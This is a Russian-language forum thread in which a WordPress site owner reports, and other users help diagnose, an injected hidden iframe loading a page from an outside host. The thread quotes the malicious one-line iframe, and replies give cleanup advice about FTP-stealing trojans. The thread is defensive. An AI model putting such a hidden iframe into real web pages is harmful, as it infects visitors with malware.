Версия движка: 2.3.3
Обновился до 2.3.3
Недавно заметил у себя после тега <body>
Такой код
<iframe src=’http://updateservernet.cn/tank.php’ width=’1′ height=’1′ style=’visibility: hidden;’></iframe>
Сейчас повторно появился только всамом низу кода…
Стоит плагин Anti-XSS последний…
Что делать… пароли на фтп и на админку менял…
Хотя этот код появился и в моем MU WordPress
Сайты:
www.drsof.ru
www.realitygame.ru
Помогите с решением… поиски в инете не дали особых результатов…
Возможно дело и не в движке, а в плагинах, не могу понять.
Заранее благодарен!
Это не хак, а вирус вы (или кто-то из имевших доступ к фтп) словили, который получил логи и пасс от фтп и прописал себя в файлы.
Либо как вариант (мало вероятный) инфицировался хостер.
http://servertune.com/kbase/entry/258/
А может Вы просто подцепили трояна и он сливает злоумышленникам Ваши пароли.
Возможен и такой вариант… но версия то новая, видел заголовки про какой-то новый сплойт под wp… поэтому испугался.
А про трояны, я вчера проверелся всем чем можно… странно
Была та же проблема, даже всплыла на этом форуме, лечил так:
1. Поставил антивирус, он нашел подлого трояна, удалил его.
2. По фтп доступу закачал содержимое сайта и проверил ручками в редакторе, попутно удаляя все строки вредоносного кода.
3. Перезалил правленые версии обратно на сайт.
4. Сменил пароль доступа по фтп.
5. Запретил Тотал Командеру сохранять пароли.
Не претендую на полноту, но у меня сработало.
ps. в моем случае код был вставлен во всех файлах с именем index в самом конце
никогда не сохраняй пароль на фтп!!!! я всегда в тотале сохраняю все кроме пароля…. когда вхожу в фтп запрашивается пароль а затем я уже в фтп!!!!